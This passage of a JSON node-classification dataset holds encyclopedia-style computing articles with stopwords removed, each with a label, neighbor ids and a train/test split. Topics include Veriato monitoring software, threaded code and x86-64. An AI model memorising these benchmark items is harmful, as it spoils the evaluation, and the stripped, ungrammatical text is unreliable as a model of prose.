1996 reported heuristic program detecting puns japanese language possible application assistance language acquisition described section pun generation another envisioned use joke generators cases steady supply jokes quantity important quality another obvious yet remote direction automated joke appreciation known humans interact computers ways similar interacting humans may described terms personality politeness flattery in-group favoritism therefore role humor human-computer interaction investigated particular humor generation user interface ease communications computers suggested craig mcdonough implemented mnemonic sentence generator converts passwords humorous sentences basing incongruity theory humor suggested resulting meaningless funny sentences easier remember example password ajqa3jtv converted arafat joined quayle ant tarar jeopardized thurmond vase john allen paulos known interest mathematical foundations humor book mathematics humor study logic humor demonstrates structures common humor formal sciences mathematics linguistics develops mathematical model jokes based catastrophe theory",
    "neighbors": [
      2440,
      1890,
      4635,
      3528
    ],
    "mask": "Test"
  },
  {
    "node_id": 5351,
    "label": 4,
    "text": "Veriato:veriato veriato formerly known spectorsoft software company develops sells user behavior analytics employee monitoring software based palm beach gardens located palm beach county florida united states founded 1998 company early entrant internet monitoring software 2008 private equity firms harbourvest partners westview capital partners invested company taking majority ownership position spectorsoft originally serviced consumer business customers longer sells software consumer home use opened west palm beach office london office 2011 2012 spectorsoft acquired assets corner bowl software completely exited consumer market march 31st 2015 moved larger office palm beach gardens 2017 2016 company renamed veriato inc company provider employee monitoring user behavior analytics ransomware detection log management solutions enterprise mid-market small business veriato recon — user behavior analytics solution software detects alerts anomalies related insider threat behaviors also enables review online activity employees high risk exit period veriato 360 — user activity monitoring solution enabling companies retain review report alert employee activity used monitoring higher risk employees incident response provides visibility contextual information veriato investigator — employee investigation solution temporary focused investigations records detailed information employee activity enables exploration playback recorded data veriato log manager — provides event security log management centrally monitors windows unix linux switches routers hubs veriato server manager — adds application resource disk monitoring event log management features found spectorsoft log manager veriato ransomsafe — veriato ransomsafe™ acts vital layer ransomware defense combining just-in-time data protection multiple mechanisms detect shut attacks hold business hostage veriato cerebral — cerebral fully integrated insider threat intelligence platform powered artificial intelligence spector pro given pc magazine editors choice award 2002 review six computer activity monitoring tools 2004 version 5.0 spector pro given editors choice award field four programs 2008 spector 360 sr3 pc magazine editors choice award 2004 spectorsoft listed first time one inc. magazine top 500 fastest-growing private companies america position 224 company achieved position list 2005 number 497 2009 spectorsoft made list inc. 5000 companies number 3340 2010 2011 spectorsoft made inc. magazine 500/5000 list spectorsoft−veriato products mentioned zdnet pc/computing time cnn nbc nightly news new york times wall street journal 2014 spectorsoft sc magazine europe best fraude prevention award best interop 2014 security award spector 360 recon product target audiences spectorsoft−veriato products employers want record activities employees company-owned workstations mobile devices laptops employers may choose monitor employees using spectorsoft−veriato software however still privacy concerns things like personal email spectorsoft addresses privacy issues regularly paper authorized leading privacy attorney available website educators school administrators school districts required protect students online predators cipa ferpa schools use blocking filtering solutions may block sites needed research block new sites yet included filtering solution spector 360 works filters provide additional layer protection also helps keep students on-task providing teachers technology coordinators reports charts show web sites students visit long spent keyword alerts let lab instructors administrators see may violating school acceptable use policy aup spectorsoft−veriato tools especially eblaster used criminal activities several convictions misuse spectorsoft software contains eula specifying installation must machines owned licensee also indicating spectorsoft cooperate law enforcement compelled since spectorsoft−veriato software specifically designed difficult detect remove tools especially eblaster used thieves wish steal credit card information banking information passwords installation software occur without user knowledge permission spectorsoft openly advertise tools record user passwords recorded cases happening parents use spectorsoft−veriato software monitor children internet use spectorsoft marketed spy software people wanting catch spouses cheating however face criminal charges negative publicity spectorsoft longer markets products spouses however nothing stop spouse using products illegally example man michigan installed eblaster partner personal computer charged four felony counts facing five years prison 19,000 fines 2013 texas woman filed criminal complaint estranged husband using eblaster spy facebook e-mail communications patent infringement case helios software llc et al v. spectorsoft corporation concluded september 2014 court granted summary judgment non-infringement ‘ 571 ‘ 237 patents june 2015 five-day trial jury returned verdict direct indirect infringement spectorsoft ‘ 304 patent also found several asserted claims patent invalid anticipated rendered obvious prior art see docket entry 615 civ 12-081-lps",
    "neighbors": [
      3433,
      9233,
      2151
    ],
    "mask": "Train"
  },
  {
    "node_id": 5352,
    "label": 9,
    "text": "CDR_coding:cdr coding computer science cdr coding compressed data representation lisp linked lists developed patented mit artificial intelligence laboratory implemented computer hardware number lisp machines derived mit cadr cdr coding fact fairly general idea whenever data object ends reference another data structure b instead place structure b overlapping running end free space required reference add done many times also improve locality reference enhancing performance modern machines transformation especially effective cons-based lists created free half space node perform transformation always possible perform substitution might large enough chunk free space beyond end thus objects end real reference referenced object machine must able tell reading final cell one accomplished inefficiency software use tagged pointers allow pointer final position specifically tagged best done hardware presence mutable objects cdr coding becomes complex reference updated point another object currently object stored field object must relocated along pointers moves typically expensive impossible time cause fragmentation store problem typically avoided using cdr coding immutable data structures unrolled linked lists simpler often higher-performance cdr coding tagged pointers typically less fragmentation short lists cdr coding uses least amount space",
    "neighbors": [
      3512,
      4101
    ],
    "mask": "Test"
  },
  {
    "node_id": 5353,
    "label": 4,
    "text": "IT_Baseline_Protection_Catalogs:baseline protection catalogs baseline protection catalogs it-grundschutz-kataloge baseline protection manual 2005 collection documents german federal office security information technology bsi provide useful information detecting weaknesses combating attacks information technology environment cluster collection encompasses 3000 pages including introduction catalogs serves basis baseline protection certification enterprise baseline protection protection encompasses standard security measures typical systems normal protection needs detection assessment weak points systems often occurs way risk assessment wherein threat potential assessed costs damage system group similar systems investigated individually approach time-intensive expensive protection may rather proceed typical threat applies 80 cases recommend adequate countermeasures way security level achieved viewed adequate cases consequently replace expensive risk assessment cases security needs greater protection used basis action familiarize user manual contains introduction explanations approach baseline protection series concept role definitions glossary component catalogs threat catalogs measures catalogs follow introductory sections forms cross-reference tables supplement collection available federal office security information technology bsi internet platform also find baseline protection guide containing support functions implementing baseline protection procedural detail catalog element identified individual mnemonic laid according following scheme catalog groups named first c stands component measure threat followed layer number affected element finally serial number within layer identifies element component catalog central element contains following five layers overall aspects infrastructure systems networks applications partitioning layers clearly isolates personnel groups impacted given layer layer question first layer addressed management including personnel outsourcing second addressed in-house technicians regarding structural aspects infrastructure layer system administrators cover third layer looking characteristics systems including clients servers private branch exchanges fax machines fourth layer falls within network administrators task area fifth within applications administrator user concerning software like database management systems e-mail web servers individual component follows layout component number composed layer number component located unique number within layer given threat situation depicted short description component examining facts itemization individual threat sources ultimately follows present supplementary information necessary work establish baseline protection necessary measures presented text short illustrations text follows facts life cycle question includes planning design acquisition necessary realization operation selection necessary preventive measures complete depiction individual measures collected list arranged according measures catalog structure rather life cycle process classification measures categories b c z undertaken category measures entry point subject b measures expand category c ultimately necessary baseline protection certification category z measures additional measures proven practice keep component compact possible global aspects collected one component specific information collected second example apache web server general b 5.4 web server component measures threats web server depicted would apply well b5.11 component deals specifically apache web server components must successfully implemented guarantee system security respective measures threats introduced component also relevant components way network individual components arises baseline protection catalogs threat catalogs connection component catalogs offer detail potential threats systems threat catalogs follow general layout layers force majeure organizational deficiencies spurious human action technical failure premeditated acts distinguished according bsi knowledge collected catalogs necessary establish baseline protection baseline protection however demand understanding measures well vigilance management individual threat sources described briefly finally examples damages triggered threat sources given measures catalogs summarize actions necessary achieve baseline protection measures appropriate several system components described centrally process layers used structuring individual measures groups following layers formed infrastructure organization personnel hardware software communication preventive measures managers initially named initiate realize measures respective measures description detailed description measures follows finally control questions regarding correct realization given realization measures personnel verify whether adaptation operation question necessary deviations initial measures documented future reference besides information summarized baseline protection manual federal office data security provides material internet forms provided serve remedy protection needs certain system components table summarizes measures applied individual components regard measure named degree realization determined degrees realization considerable yes partial distinguished finally realization terminated manager named measures realization possible reasons entered adjacent field later traceability conclusion consists cost assessment besides forms cross-reference tables another useful supplement summarize measures important threats individual components measures well threats cited mnemonics measures cited priority classification table contains correlations measures threats address however cross-reference tables cite important threats measure cited given threat applicable individual system superfluous baseline protection ensured measures realized",
    "neighbors": [
      225,
      8637,
      10600,
      4490,
      11567,
      6360,
      4379,
      5373,
      383
    ],
    "mask": "Test"
  },
  {
    "node_id": 5354,
    "label": 9,
    "text": "Threaded_code:threaded code computer science term threaded code refers programming technique code form essentially consists entirely calls subroutines often found compiler implementations generate code form and/or implemented form code may processed interpreter may simply sequence machine code call instructions threaded code better code density code generated alternative code generation techniques alternative calling conventions sometimes expense slightly slower execution speed however program small enough fit fully computer processor cache may run faster larger program suffers many cache misses small programs may also run faster programs fill cache switching threads threaded code best known implementation technique commonly used programming languages forth many implementations basic implementations cobol early versions b languages small minicomputers amateur radio satellites common way make computer programs 'translate computer program written symbolic language machine code using compiler code typically fast nonportable since binary code designed specific computer hardware platform different approach uses virtual machine instruction set particular target hardware interpreter executes new target hardware early computers relatively little memory example data general nova ibm 1130 many first apple ii computers 4 kb ram installed consequently lot time spent trying find ways reduce size programs would fit memory available time computers relatively slow simple interpretation noticeably slower executing machine code instead writing every step operation every part program needed programmers saved memory writing step operations see n't repeat placing subroutine processcode refactoringis used today although different reasons top-level application programs may consist nothing subroutine calls many subroutines turn also consist nothing lower level subroutine calls mainframes early microprocessors rca 1802 required several instructions call subroutine top-level application many subroutines sequence constantly repeated subroutine address changing one call next using memory store instructions repeatedly wasteful save space programmers squeezed series subroutine calls list containing contiguous addresses sub-routines used tiny interpreter call subroutine turn identical way programmers squeezed series jumps branch table dispatch table virtual method table list containing destination addresses used small selector branch selected destination threaded code techniques program becomes list entry points actual code executed years programmers created many variations interpreter small selector particular address list addresses may extracted using index general purpose register pointer addresses may direct indirect contiguous non-contiguous linked pointers relative absolute resolved compile time dynamically built one variation best situations save space programmers squeezed lists subroutine calls simple lists subroutine addresses used small loop call subroutine turn example following pseudocode uses technique add two numbers b example list labeled thread variable ip instruction pointer tracks place within list another variable sp stack pointer contains address elsewhere memory available hold value temporarily calling loop codice_1 simple repeated inline end subroutine control jumps end subroutine start another instead jumping twice via codice_1 example called direct threaded code dtc although technique older first widely circulated use term threaded code probably bell article threaded code 1973 charles h. moore invented compact notation 1970 forth virtual machine indirect threaded code itc originally moore invented easy fast nova minicomputers indirection bit every address said published remarks byte magazine forth issue found convenient propagated later forth designs forth compilers compile forth programs direct-threaded code others make indirect-threaded code programs act either way practically executable threaded code uses one another methods invoking subroutines method called threading model addresses thread addresses machine language form simple may overheads thread consists machine addresses parameters must loaded indirectly memory forth systems produce direct-threaded code many machines direct-threading faster subroutine threading see reference example stack machine might execute sequence push push b add might translated following thread routines codice_3 initialized address labeled codice_4 i.e. address codice_5 stored alternatively operands may included thread remove indirection needed makes thread larger indirect threading uses pointers locations turn point machine code indirect pointer may followed operands stored indirect block rather storing repeatedly thread thus indirect code often compact direct-threaded code indirection also typically makes slower though still usually faster bytecode interpreters handler operands include values types space savings direct-threaded code may significant older forth systems typically produce indirect-threaded code example goal execute push push b add following might used codice_3 initialized address codice_7 code fragment codice_8 codice_9 found double-indirecting codice_3 indirect block operands fragment found indirect block following fragment address requires keeping current subroutine codice_3 unlike previous examples contained next subroutine called so-called subroutine-threaded code also call-threaded code consists series machine-language call instructions addresses functions call opposed direct threading use jump early compilers algol fortran cobol forth systems often produced subroutine-threaded code code many systems operated last-in-first-out lifo stack operands well-developed compiler theory modern processors special hardware support subroutine call return instructions overhead one extra machine instruction per dispatch somewhat diminished anton ertl stated contrast popular myths subroutine threading usually slower direct threading however ertl recent tests show subroutine threading faster direct threading 15 25 test cases ertl recent tests show direct threading fastest threading model xeon opteron athlon processors indirect threading fastest threading model pentium processors subroutine threading fastest threading model pentium 4 pentium iii ppc processors example call threading push push b add token threaded code uses lists 8 12-bit indexes table pointers token threaded code notably compact without much special effort programmer usually half three-fourths size threaded-codes quarter eighth size compiled code table pointers either indirect direct forth compilers produce token threaded code programmers consider p-code generated pascal compilers well bytecodes used .net java basic c compilers token-threading common approach historically bytecode uses 8-bit opcodes often stack-based virtual machine typical interpreter known decode dispatch interpreter follows form virtual machine uses byte-size instructions codice_12 simply fetch codice_13 often commonly used 1-byte instructions plus less-common multibyte instructions case codice_12 complex decoding single byte opcodes simply efficiently handled branch table using opcode directly index instructions individual operations simple push add overhead involved deciding execute larger cost actually executing interpreters often much slower machine code however complex compound instructions overhead percentage proportionally less significant huffman threaded code consists lists tokens stored huffman codes huffman code variable length bit string used identify unique token huffman-threaded interpreter locates subroutines using index table tree pointers navigated huffman code huffman threaded code one compact representations known computer program basically index codes organized measuring frequency subroutine occurs code frequent calls given shortest codes operations approximately equal frequencies given codes nearly equal bit-lengths huffman-threaded systems implemented direct-threaded forth systems used pack large amounts slow-running code small cheap microcontrollers published uses smart cards toys calculators watches bit-oriented tokenized code used pbasic seen kind huffman threaded code example string threading operations identified strings usually looked-up hash table used charles h. moore earliest forth implementations university illinois experimental hardware-interpreted computer language also used bashforth examples show branches interpreters branch changes thread pointer codice_3 example conditional branch top-of-stack value zero might encoded follows note codice_16 location jump address handler must skipped codice_17 whether branch taken separating data return stacks machine eliminates great deal stack management code substantially reducing size threaded code dual-stack principle originated three times independently burroughs large systems forth postscript used java virtual machines three registers often present threaded virtual machine another one exists passing data subroutines 'words often threaded virtual machines implementations forth simple virtual machine heart consisting three primitives indirect-threaded virtual machine one given operations perhaps simplest fastest interpreter virtual machine",
    "neighbors": [
      512,
      9739,
      10395,
      1952,
      8609,
      8868,
      6821,
      1702,
      5677,
      1841,
      2045,
      8628,
      9911,
      3904,
      7616,
      8262,
      8524,
      2638,
      1103,
      9172,
      1376,
      10734,
      5872,
      9714,
      3573,
      7421
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5355,
    "label": 9,
    "text": "C_to_HDL:c hdl c hdl tools convert c language c-like computer code hardware description language hdl vhdl verilog converted code synthesized translated hardware device field-programmable gate array compared software equivalent designs hardware consume less power yielding higher performance per watt execute faster lower latency parallelism higher throughput however system design functional verification hardware description language tedious time-consuming systems engineers often write critical modules hdl modules high-level language synthesize hdl c hdl high-level synthesis tools c another name methodology rtl refers register transfer level representation program necessary implement logic early development c hdl done ian page charles sweeney colleagues oxford university 1990s developed handel-c language commercialized research forming embedded solutions limited esl 1999 renamed celoxica september 2000 2008 embedded systems departments celoxica sold catalytic 3 million later merged become agility computing january 2009 mentor graphics acquired agility c synthesis assets celoxica continues trade concentrating hardware acceleration financial industries c hdl techniques commonly applied applications unacceptably high execution times existing general-purpose supercomputer architectures examples include bioinformatics computational fluid dynamics cfd financial processing oil gas survey data analysis embedded applications requiring high performance real-time data processing also area use system-on-chip soc design may also take advantage c hdl techniques c-to-vhdl compilers useful large designs implementing code might change future designing large application entirely hdl may difficult time-consuming abstraction high level language large application often reduce total development time furthermore application coded hdl almost certainly difficult modify one coded higher level language designer needs add new functionality application adding lines c code almost always easier remodeling equivalent hdl code flow hdl tools similar aim flow rather c-based design",
    "neighbors": [
      7699,
      9366,
      9371,
      10658,
      4773,
      7462,
      3886,
      2224,
      3762,
      8508,
      6716,
      2623,
      8514,
      4036,
      11333,
      1480,
      4811,
      9932,
      3159,
      11487,
      5090,
      5861,
      1770,
      9330,
      4596,
      11125,
      6268,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5356,
    "label": 3,
    "text": "X86-64:x86-64 x86-64 also known x64 x86_64 amd64 intel 64 64-bit version x86 instruction set introduces two new modes operation 64-bit mode compatibility mode along new 4-level paging mode 64-bit mode new paging mode supports vastly larger amounts virtual memory physical memory possible 32-bit predecessors allowing programs store larger amounts data memory x86-64 also expands general-purpose registers 64-bit well extends number 8 limited fixed functionality e.g stack management 16 fully general provides numerous enhancements floating point operations supported via mandatory sse2-like instructions x87/mmx style registers generally used still available even 64-bit mode instead set 32 vector registers 128 bits used store one two double-precision numbers one four single precision numbers various integer formats 64-bit mode instructions modified support 64-bit operands 64-bit addressing mode compatibility mode allows 16- 32-bit user applications run unmodified coexisting 64-bit applications 64-bit operating system supports full x86 16-bit 32-bit instruction sets remain implemented hardware without intervening emulation older executables run little performance penalty newer modified applications take advantage new features processor design achieve performance improvements also processor supporting x86-64 still powers real mode full backward compatibility x86 processors done since 80286 original specification created amd released 2000 implemented amd intel via amd k8 microarchitecture opteron athlon64 processors first implement first significant addition x86 architecture designed company intel intel forced follow suit introduced modified netburst family software-compatible amd specification via technologies introduced x86-64 via isaiah architecture via nano x86-64 architecture distinct intel itanium architecture formerly ia-64 compatible native instruction set level x86 architecture operating systems applications written one run amd64 created alternative radically different ia-64 architecture designed intel hewlett packard originally announced 1999 full specification became available august 2000 amd64 architecture positioned amd beginning evolutionary way add 64-bit computing capabilities existing x86 architecture opposed intel approach creating entirely new 64-bit architecture ia-64 first amd64-based processor opteron released april 2003 amd processors implementing amd64 architecture include opteron athlon 64 athlon 64 x2 athlon 64 fx athlon ii followed x2 x3 x4 indicate number cores xlt models turion 64 turion 64 x2 sempron palermo e6 stepping manila models phenom followed x3 x4 indicate number cores phenom ii followed x2 x3 x4 x6 indicate number cores fx fusion/apu ryzen/epyc primary defining characteristic amd64 availability 64-bit general-purpose processor registers example rax rbx 64-bit integer arithmetic logical operations 64-bit virtual addresses designers took opportunity make improvements well significant changes described although virtual addresses 64 bits wide 64-bit mode current implementations chips known planning stages allow entire virtual address space 2 bytes 16 eb used would approximately four billion times size virtual address space 32-bit machines operating systems applications need large address space foreseeable future implementing wide virtual addresses would simply increase complexity cost address translation real benefit amd therefore decided first implementations architecture least significant 48 bits virtual address would actually used address translation page table lookup addition amd specification requires significant 16 bits virtual address bits 48 63 must copies bit 47 manner akin sign extension requirement met processor raise exception addresses complying rule referred canonical form canonical form addresses run 0 00007fff'ffffffff ffff8000'00000000 ffffffff'ffffffff total 256 tb usable virtual address space still 65,536 times larger virtual 4 gb address space 32-bit machines feature eases later scalability true 64-bit addressing many operating systems including limited windows nt family take higher-addressed half address space named kernel space leave lower-addressed half user space application code user mode stacks heaps data regions canonical address design ensures every amd64 compliant implementation effect two memory halves lower half starts 00000000'00000000 grows upwards virtual address bits become available higher half docked top address space grows downwards also enforcing canonical form addresses checking unused address bits prevents use operating system tagged pointers flags privilege markers etc. use could become problematic architecture extended implement virtual address bits first versions windows x64 even use full 256 tb restricted 8 tb user space 8 tb kernel space windows support entire 48-bit address space windows 8.1 released october 2013 64-bit addressing mode long mode superset physical address extensions pae page sizes may 4 kb 2 bytes 2 mb 2 bytes long mode also supports page sizes 1 gb 2 bytes rather three-level page table system used systems pae mode systems running long mode use four levels page table pae page-directory pointer table extended four entries 512 additional page-map level 4 pml4 table added containing 512 entries 48-bit implementations full mapping hierarchy 4 kb pages whole 48-bit space would take bit 512 gb memory 0.195 256 tb virtual space intel proposed scheme five-level page table implemented would allow intel 64 processors support 57-bit virtual address space operating system also limit virtual address space details applicable given operating system compatibility characteristics section current amd64 processors support physical address space 2 bytes ram 256 tb however known x86-64 motherboards support 256 tb ram operating system may place additional limits amount ram usable supported details point given operating system compatibility characteristics section article architecture two primary modes operation long mode legacy mode long mode architecture intended primary mode operation combination processor native 64-bit mode combined 32-bit 16-bit compatibility mode used 64-bit operating systems 64-bit operating system 64-bit programs run 64-bit mode 32-bit 16-bit protected mode applications need use either real mode virtual 8086 mode order execute time run compatibility mode real-mode programs programs use virtual 8086 mode time run long mode unless modes emulated software however programs may started operating system running long mode processors supporting vt-x amd-v creating virtual processor running desired mode since basic instruction set almost performance penalty executing protected mode x86 code unlike intel ia-64 differences underlying instruction set mean running 32-bit code must done either emulation x86 making process slower dedicated x86 coprocessor however x86-64 platform many x86 applications could benefit 64-bit recompile due additional registers 64-bit code guaranteed sse2-based fpu support compiler use optimization however applications regularly handle integers wider 32 bits cryptographic algorithms need rewrite code handling huge integers order take advantage 64-bit registers legacy mode mode used 32-bit 16-bit protected mode operating systems mode processor acts like older x86 processor 16-bit 32-bit code executed legacy mode allows maximum 32 bit virtual addressing limits virtual address space 4 gb 64-bit programs run legacy mode intel 64 intel implementation x86-64 used implemented various processors made intel historically amd developed produced processors instruction sets patterned intel original designs x86-64 roles reversed intel found position adopting isa amd created extension intel x86 processor line intel project originally codenamed yamhill yamhill river oregon willamette valley several years denying existence intel announced february 2004 idf project indeed underway intel chairman time craig barrett admitted one worst-kept secrets intel name instruction set changed several times name used idf ct presumably clackamas technology another codename oregon river within weeks began referring ia-32e ia-32 extensions march 2004 unveiled official name em64t extended memory 64 technology late 2006 intel began instead using name intel 64 implementation paralleling amd use name amd64 first processor implement intel 64 multi-socket processor xeon code-named nocona june 2004 contrast initial prescott chips february 2004 enable feature intel subsequently began selling intel 64-enabled pentium 4s using e0 revision prescott core sold oem market pentium 4 model f. e0 revision also adds execute disable xd intel name nx bit intel 64 included current xeon code-named irwindale intel official launch intel 64 name em64t time mainstream desktop processors n0 stepping prescott-2m first intel mobile processor implementing intel 64 merom version core 2 processor released july 27 2006 none intel earlier notebook cpus core duo pentium celeron mobile pentium 4 implement intel 64 intel processors implementing intel64 architecture include pentium 4 f-series/5x1 series 506 516 celeron models 3x1 3x6 355 347 352 360 365 later celerons models xeon since nocona models pentium dual-core processors since merom-2m atom 230 330 d410 d425 d510 d525 n450 n455 n470 n475 n550 n570 n2600 n2800 versions pentium pentium extreme edition core 2 core i9 core i7 core i5 core i3 processors xeon phi 7200 series processors via technologies introduced first implementation x86-64 architecture 2008 five years development cpu division centaur technology codenamed isaiah 64-bit architecture unveiled january 24 2008 launched may 29 via nano brand name processor supports number via-specific x86 extensions designed boost efficiency low-power appliances expected isaiah architecture twice fast integer performance four times fast floating-point performance previous-generation via esther equivalent clock speed power consumption also expected par previous-generation via cpus thermal design power ranging 5 w 25 w. completely new design isaiah architecture built support features like x86-64 instruction set x86 virtualization unavailable predecessors via c7 line retaining encryption extensions although nearly identical differences two instruction sets semantics seldom used machine instructions situations mainly used system programming compilers generally produce executables i.e machine code avoid differences least ordinary application programs therefore interest mainly developers compilers operating systems similar must deal individual special system instructions supercomputers tracked top500 appearance 64-bit extensions x86 architecture enabled 64-bit x86 processors amd intel light olive circles red circles diagram provided section respectively replace risc processor architectures previously used systems including pa-risc sparc alpha others well 32-bit x86 green dots purple dots diagram even though intel initially tried unsuccessfully replace x86 new incompatible 64-bit architecture itanium processor main non-x86 cpu architecture still used supercomputing power isa used ibm power microprocessors blue diamond pattern diagram sparc far behind numbers top500 2011 fujitsu sparc64 viiifx based supercomputer without co-processors reached number one since dropped top-10 first arm-based supercomputer appeared list 2018 recent years non-cpu architecture co-processors gpgpu also played big role performance intel xeon phi knights corner coprocessors implement subset x86-64 vector extensions also used along x86-64 processors tianhe-2 supercomputer following operating systems releases support x86-64 architecture long mode preliminary infrastructure work started february 2004 x86-64 port development later stalled development started july 2007 continued google summer code 2008 soc 2009 first official release contain x86-64 support version 2.4 freebsd first added x86-64 support name amd64 experimental architecture 5.1-release june 2003 included standard distribution architecture 5.2-release january 2004 since freebsd designated tier 1 platform 6.0-release version cleaned quirks running x86 executables amd64 drivers work x86 architecture work currently done integrate fully x86 application binary interface abi manner linux 32-bit abi compatibility currently works x86-64 architecture support first committed netbsd source tree june 19 2001 netbsd 2.0 released december 9 2004 netbsd/amd64 fully integrated supported port 32-bit code still supported 64-bit mode netbsd-32 kernel compatibility layer 32-bit syscalls nx bit used provide non-executable stack heap per-page granularity segment granularity used 32-bit x86 openbsd supported amd64 since openbsd 3.5 released may 1 2004 complete in-tree implementation amd64 support achieved prior hardware initial release amd loaned several machines project hackathon year openbsd developers taken platform support nx bit allowed easy implementation w^x feature code amd64 port openbsd also runs intel 64 processors contains cloned use amd64 extensions since intel left page table nx bit early intel 64 processors w^x capability intel cpus later intel 64 processors added nx bit name xd bit symmetric multiprocessing smp works openbsd amd64 port starting release 3.6 november 1 2004 possible enter long mode dos without dos extender user must return real mode order call bios dos interrupts may also possible enter long mode dos extender similar dos/4gw complex since x86-64 lacks virtual 8086 mode dos aware benefits expected unless running dos emulation adequate virtualization driver backend example mass storage interface linux first operating system kernel run x86-64 architecture long mode starting 2.4 version 2001 preceding hardware availability linux also provides backward compatibility running 32-bit executables permits programs recompiled long mode retaining use 32-bit programs several linux distributions currently ship x86-64-native kernels userlands arch linux suse mandriva debian allow users install set 32-bit components libraries installing 64-bit dvd thus allowing existing 32-bit applications run alongside 64-bit os distributions fedora slackware ubuntu available one version compiled 32-bit architecture another compiled 64-bit architecture fedora red hat enterprise linux allow concurrent installation userland components 32 64-bit versions 64-bit system x32 abi application binary interface introduced linux 3.4 allows programs compiled x32 abi run 64-bit mode x86-64 using 32-bit pointers data fields though limits program virtual address space 4 gb also decreases memory footprint program cases allow run faster 64-bit linux allows 128 tb virtual address space individual processes address approximately 64 tb physical memory subject processor system limitations mac os x 10.4.7 higher versions mac os x 10.4 run 64-bit command-line tools using posix math libraries 64-bit intel-based machines versions mac os x 10.4 10.5 run 64-bit powerpc machines libraries frameworks work 64-bit applications mac os x 10.4 kernel kernel extensions 32-bit mac os x 10.5 supports 64-bit gui applications using cocoa quartz opengl x11 64-bit intel-based machines well 64-bit powerpc machines non-gui libraries frameworks also support 64-bit applications platforms kernel kernel extensions 32-bit mac os x 10.6 first version macos supports 64-bit kernel however 64-bit computers run 64-bit kernel 64-bit computers run 64-bit kernel default 64-bit kernel like 32-bit kernel supports 32-bit applications kernels also support 64-bit applications 32-bit applications virtual address space limit 4 gb either kernel os x 10.8 includes 64-bit kernel continues support 32-bit applications 64-bit kernel support 32-bit kernel extensions 32-bit kernel support 64-bit kernel extensions macos uses universal binary format package 32- 64-bit versions application library code single file appropriate version automatically selected load time mac os x 10.6 universal binary format also used kernel kernel extensions support 32-bit 64-bit kernels solaris 10 later releases support x86-64 architecture solaris 10 sparc architecture one operating system image contains 32-bit kernel 64-bit kernel labeled x64/x86 dvd-rom image default behavior boot 64-bit kernel allowing 64-bit existing new 32-bit executables run 32-bit kernel also manually selected case 32-bit executables run codice_24 command used determine system running 64-bit kernel solaris 11 64-bit kernel provided however 64-bit kernel supports 32- 64-bit executables libraries system calls x64 editions microsoft windows client server—windows xp professional x64 edition windows server 2003 x64 edition—were released march 2005 internally actually build 5.2.3790.1830 sp1 share source base operating system binaries even system updates released unified packages much manner windows 2000 professional server editions x86 windows vista also many different editions released january 2007 windows 7 released july 2009 windows server 2008 r2 sold x64 itanium editions later versions windows server offer x64 edition versions windows x64 prior windows 8.1 windows server 2012 r2 offer following windows 8.1 windows server 2012 r2 user mode kernel mode virtual address spaces extended 128 tb versions windows install processors lack codice_17 instruction following additional characteristics apply x64 versions windows playstation 4 xbox one successors incorporate amd x86-64 processors based jaguar microarchitecture firmware games written x86-64 code legacy x86 code involved since amd64 intel 64 substantially similar many software hardware products use one vendor-neutral term indicate compatibility implementations amd original designation processor architecture x86-64 still sometimes used purpose variant x86_64 companies microsoft sun microsystems/oracle corporation use contraction x64 marketing material term ia-64 refers itanium processor confused x86-64 completely different instruction set many operating systems products especially introduced x86-64 support prior intel entry market use term amd64 amd64 refer amd64 intel 64. x86-64/amd64 solely developed amd amd holds patents techniques used amd64 patents must licensed amd order implement amd64 intel entered cross-licensing agreement amd licensing amd patents existing x86 techniques licensing amd patents techniques used x86-64 2009 amd intel settled several lawsuits cross-licensing disagreements extending cross-licensing agreements",
    "neighbors": [
      6151,
      6153,
      4108,
      6158,
      10254,
      4112,
      10258,
      19,
      8226,
      6180,
      44,
      10284,
      2094,
      8243,
      56,
      2105,
      8248,
      2107,
      6207,
      8266,
      4173,
      4174,
      6231,
      4192,
      6243,
      10340,
      2149,
      6245,
      4204,
      8303,
      4217,
      8315,
      6270,
      8322,
      2180,
      8325,
      8327,
      10375,
      142,
      10383,
      4248,
      10394,
      4255,
      2212,
      2225,
      4276,
      2236,
      2237,
      10428,
      10433,
      6339,
      2244,
      6340,
      6345,
      4316,
      221,
      10463,
      10478,
      8439,
      6393,
      8445,
      255,
      4374,
      2345,
      6445,
      10548,
      318,
      6462,
      8514,
      4424,
      6476,
      6483,
      8539,
      363,
      6508,
      2424,
      10623,
      4480,
      4491,
      8588,
      398,
      4505,
      4508,
      2462,
      4521,
      2476,
      8621,
      439,
      6596,
      8644,
      4550,
      2504,
      473,
      487,
      8680,
      8684,
      10732,
      499,
      10739,
      2549,
      8700,
      10752,
      10763,
      8725,
      4630,
      8728,
      10779,
      543,
      4647,
      4669,
      6718,
      2623,
      4673,
      8771,
      582,
      585,
      6730,
      4686,
      597,
      4695,
      8798,
      608,
      2658,
      10851,
      2666,
      2671,
      6768,
      2676,
      8820,
      4737,
      2693,
      6797,
      8851,
      6804,
      10910,
      2719,
      6821,
      6852,
      6858,
      8906,
      2764,
      8907,
      8908,
      6868,
      10971,
      740,
      4841,
      10985,
      8944,
      6898,
      2804,
      6924,
      6925,
      8976,
      4884,
      4886,
      4887,
      11047,
      815,
      9009,
      823,
      2872,
      833,
      6978,
      6979,
      11080,
      9042,
      9048,
      7001,
      862,
      2910,
      9064,
      876,
      7027,
      11130,
      894,
      7039,
      11135,
      9092,
      9095,
      7057,
      9107,
      2967,
      9111,
      2987,
      11184,
      9137,
      948,
      9152,
      5057,
      5065,
      9166,
      975,
      977,
      5073,
      11218,
      5076,
      5078,
      5080,
      3034,
      7134,
      3042,
      5093,
      9190,
      1000,
      3051,
      1005,
      3053,
      7151,
      11248,
      5109,
      3068,
      3070,
      1029,
      7173,
      11269,
      5148,
      11305,
      3114,
      11322,
      9280,
      7234,
      3142,
      7249,
      1119,
      11363,
      3175,
      1137,
      3188,
      9337,
      11388,
      1149,
      9342,
      1151,
      3204,
      7300,
      11396,
      7311,
      11410,
      5272,
      9369,
      1178,
      7326,
      1185,
      3245,
      5309,
      7361,
      3270,
      5335,
      1247,
      7392,
      5356,
      5358,
      3317,
      9461,
      5368,
      7421,
      5380,
      3334,
      5386,
      9487,
      11539,
      1301,
      3352,
      5401,
      11559,
      9525,
      5444,
      11595,
      1376,
      11626,
      9581,
      7534,
      1399,
      7547,
      11644,
      5503,
      1409,
      3459,
      3463,
      9611,
      1422,
      3470,
      5523,
      9625,
      3482,
      3484,
      5541,
      1455,
      7601,
      1461,
      9655,
      1469,
      9665,
      1474,
      1480,
      7629,
      1489,
      1501,
      7657,
      1515,
      5612,
